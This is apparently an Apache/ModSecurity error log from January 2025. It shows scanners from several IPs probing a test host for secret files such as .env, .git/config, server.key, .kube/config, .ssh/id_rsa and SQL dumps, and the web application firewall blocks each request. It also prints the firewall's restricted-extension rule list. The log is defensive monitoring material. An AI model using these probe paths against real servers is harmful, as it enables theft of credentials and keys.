[Thu Jan 16 22:40:38.517242 2025] [:error] [pid 514417] [client 45.148.10.69:47856] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4l81qp6-sHGFDzo830MFQAAAAA"]
[Thu Jan 16 22:40:38.517814 2025] [:error] [pid 514417] [client 45.148.10.69:47856] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4l81qp6-sHGFDzo830MFQAAAAA"]
[Thu Jan 16 22:40:38.518312 2025] [:error] [pid 514417] [client 45.148.10.69:47856] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4l81qp6-sHGFDzo830MFQAAAAA"]
[Thu Jan 16 22:40:38.723348 2025] [:error] [pid 514431] [client 45.148.10.69:47864] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4l81js2naTnIVn4cchDGAAAAAw"]
[Thu Jan 16 22:40:38.723935 2025] [:error] [pid 514431] [client 45.148.10.69:47864] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4l81js2naTnIVn4cchDGAAAAAw"]
[Thu Jan 16 22:40:38.724419 2025] [:error] [pid 514431] [client 45.148.10.69:47864] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z4l81js2naTnIVn4cchDGAAAAAw"]
[Thu Jan 16 22:40:38.926728 2025] [authz_core:error] [pid 500655] [client 45.148.10.69:47876] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Jan 16 22:40:39.105703 2025] [:error] [pid 514439] [client 45.148.10.69:47892] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4l815YkKfWElLymQx9OgwAAAA0"]
[Thu Jan 16 22:40:39.106355 2025] [:error] [pid 514439] [client 45.148.10.69:47892] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4l815YkKfWElLymQx9OgwAAAA0"]
[Thu Jan 16 22:40:39.106784 2025] [:error] [pid 514439] [client 45.148.10.69:47892] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4l815YkKfWElLymQx9OgwAAAA0"]
[Fri Jan 17 06:51:34.655081 2025] [:error] [pid 523990] [client 35.77.33.14:40184] [client 35.77.33.14] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4nv5iNVFkj0cJkJ7sCBpwAAAAI"]
[Fri Jan 17 06:51:34.655814 2025] [:error] [pid 523990] [client 35.77.33.14:40184] [client 35.77.33.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4nv5iNVFkj0cJkJ7sCBpwAAAAI"]
[Fri Jan 17 06:51:34.656304 2025] [:error] [pid 523990] [client 35.77.33.14:40184] [client 35.77.33.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4nv5iNVFkj0cJkJ7sCBpwAAAAI"]
[Fri Jan 17 19:12:40.011550 2025] [:error] [pid 529316] [client 109.202.99.36:18135] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z4qdmPR3xsZuRAOhN3SY0gAAABA"]
[Fri Jan 17 19:12:40.012610 2025] [:error] [pid 529316] [client 109.202.99.36:18135] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z4qdmPR3xsZuRAOhN3SY0gAAABA"]
[Fri Jan 17 19:12:40.013050 2025] [:error] [pid 529316] [client 109.202.99.36:18135] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z4qdmPR3xsZuRAOhN3SY0gAAABA"]
[Fri Jan 17 19:12:40.060757 2025] [:error] [pid 525438] [client 109.202.99.36:9837] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z4qdmBDAmfxvruEgXgUXYAAAAAY"]
[Fri Jan 17 19:12:40.061331 2025] [:error] [pid 525438] [client 109.202.99.36:9837] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z4qdmBDAmfxvruEgXgUXYAAAAAY"]
[Fri Jan 17 19:12:40.061784 2025] [:error] [pid 525438] [client 109.202.99.36:9837] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z4qdmBDAmfxvruEgXgUXYAAAAAY"]
[Fri Jan 17 19:12:40.090072 2025] [:error] [pid 523989] [client 109.202.99.36:14491] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z4qdmECHpC1HFoJP7KyciwAAAAE"]
[Fri Jan 17 19:12:40.090968 2025] [:error] [pid 523989] [client 109.202.99.36:14491] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z4qdmECHpC1HFoJP7KyciwAAAAE"]
[Fri Jan 17 19:12:40.091149 2025] [:error] [pid 529313] [client 109.202.99.36:24205] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z4qdmNFCMIKoXJnt9xTmiAAAAA4"]
[Fri Jan 17 19:12:40.091412 2025] [:error] [pid 523989] [client 109.202.99.36:14491] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z4qdmECHpC1HFoJP7KyciwAAAAE"]
[Fri Jan 17 19:12:40.091662 2025] [:error] [pid 529313] [client 109.202.99.36:24205] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z4qdmNFCMIKoXJnt9xTmiAAAAA4"]
[Fri Jan 17 19:12:40.092103 2025] [:error] [pid 529313] [client 109.202.99.36:24205] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Z4qdmNFCMIKoXJnt9xTmiAAAAA4"]
[Fri Jan 17 19:12:40.132588 2025] [:error] [pid 529298] [client 109.202.99.36:56015] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z4qdmNKdq31FVtZstnc5GAAAAAg"]
[Fri Jan 17 19:12:40.132792 2025] [:error] [pid 529298] [client 109.202.99.36:56015] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z4qdmNKdq31FVtZstnc5GAAAAAg"]
[Fri Jan 17 19:12:40.132971 2025] [:error] [pid 529298] [client 109.202.99.36:56015] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z4qdmNKdq31FVtZstnc5GAAAAAg"]
[Fri Jan 17 19:12:40.561916 2025] [:error] [pid 525438] [client 109.202.99.36:3065] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z4qdmBDAmfxvruEgXgUXYQAAAAY"]
[Fri Jan 17 19:12:40.562944 2025] [:error] [pid 525438] [client 109.202.99.36:3065] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z4qdmBDAmfxvruEgXgUXYQAAAAY"]
[Fri Jan 17 19:12:40.563422 2025] [:error] [pid 525438] [client 109.202.99.36:3065] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z4qdmBDAmfxvruEgXgUXYQAAAAY"]
[Fri Jan 17 19:12:40.609061 2025] [:error] [pid 529313] [client 109.202.99.36:11121] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4qdmNFCMIKoXJnt9xTmiQAAAA4"]
[Fri Jan 17 19:12:40.609470 2025] [:error] [pid 529313] [client 109.202.99.36:11121] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4qdmNFCMIKoXJnt9xTmiQAAAA4"]
[Fri Jan 17 19:12:40.609939 2025] [:error] [pid 529313] [client 109.202.99.36:11121] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4qdmNFCMIKoXJnt9xTmiQAAAA4"]
[Fri Jan 17 19:12:40.610431 2025] [:error] [pid 529313] [client 109.202.99.36:11121] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z4qdmNFCMIKoXJnt9xTmiQAAAA4"]
[Fri Jan 17 19:12:40.635263 2025] [:error] [pid 528892] [client 109.202.99.36:64319] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z4qdmOAjZTT9fswITbPSgAAAAAc"]
